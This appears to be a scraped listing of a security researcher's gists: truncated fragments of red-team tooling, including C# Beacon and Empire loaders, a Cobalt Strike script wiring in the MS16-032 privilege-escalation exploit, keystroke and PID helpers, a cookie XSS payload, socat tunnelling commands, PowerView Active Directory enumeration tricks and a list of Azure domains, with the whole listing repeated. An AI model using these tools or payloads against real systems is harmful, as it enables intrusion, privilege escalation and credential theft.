Vincent Yiu vysecurity

## beaconPayload.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

## empire.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

## ms16-032.cna
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

# logic to run this particular attack
sub exploit {

## webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
		return chr(parseNumber($1, 16, 10));
	}, @temp));
}

## getpidany.cna
# getexplorerpid($bid, &callback);
sub getanypid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $pid) = split("\\s+", $entry);
      if ($name eq $proc) {
        # $1 is our Beacon ID, $pid is the PID of $proc
        [$callback: $1, $proc, $pid];
      }

## gist:96389d70cb73f233fbced278f33ea179
alert(document.cookie);

## gist:702a165b23b2a290859e179bad3f4a18
# YOUR LOCAL BOX
socat -t0 -T0 tcp4-listen:6667,reuseaddr,fork UDP:localhost:4445
ssh user@remote_server -R 6667:localhost:6667


# REMOTE MACHINE
socat -t0 -T0 udp4-recvfrom:4445,reuseaddr,fork tcp:localhost:6667

## PowerView-2.0-tricks.ps1
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local

# retrieve all the computers a GPP password applies to

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set
#       Add : add a new object to a destination
#       Set : modify a given object
#       Invoke : lazy catch-all

## Azure
admin.iris.net
admin.mywebvalet.net
admin.seo.com.cn
api.mywebvalet.net
api.nuget.org
api.squaremeal.co.uk
app.iris.net
app.mywebvalet.net
app.swyftmedia.com
cdn.24sevenoffice.com
	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause
	# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
	#
	# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
	# 1. grab MS16-032.ps1
	# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
	# 2. store it with this script
	# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

	# logic to run this particular attack
	sub exploit {
	# convert comma separated keystroke values into a string.
	sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
	return chr(parseNumber($1, 16, 10));
	}, @temp));
	}
	# getexplorerpid($bid, &callback);
	sub getanypid {
	bps($1, lambda({
	local('$pid $name $entry');
	foreach $entry (split("\n", $2)) {
	($name, $pid) = split("\\s+", $entry);
	if ($name eq $proc) {
	# $1 is our Beacon ID, $pid is the PID of $proc
	[$callback: $1, $proc, $pid];
	}
	# YOUR LOCAL BOX
	socat -t0 -T0 tcp4-listen:6667,reuseaddr,fork UDP:localhost:4445
	ssh user@remote_server -R 6667:localhost:6667


	# REMOTE MACHINE
	socat -t0 -T0 udp4-recvfrom:4445,reuseaddr,fork tcp:localhost:6667
	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	Get-NetLocalGroup -Recurse SERVER.domain.local

	# retrieve all the computers a GPP password applies to
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	# Add : add a new object to a destination
	# Set : modify a given object
	# Invoke : lazy catch-all
	admin.iris.net
	admin.mywebvalet.net
	admin.seo.com.cn
	api.mywebvalet.net
	api.nuget.org
	api.squaremeal.co.uk
	app.iris.net
	app.mywebvalet.net
	app.swyftmedia.com
	cdn.24sevenoffice.com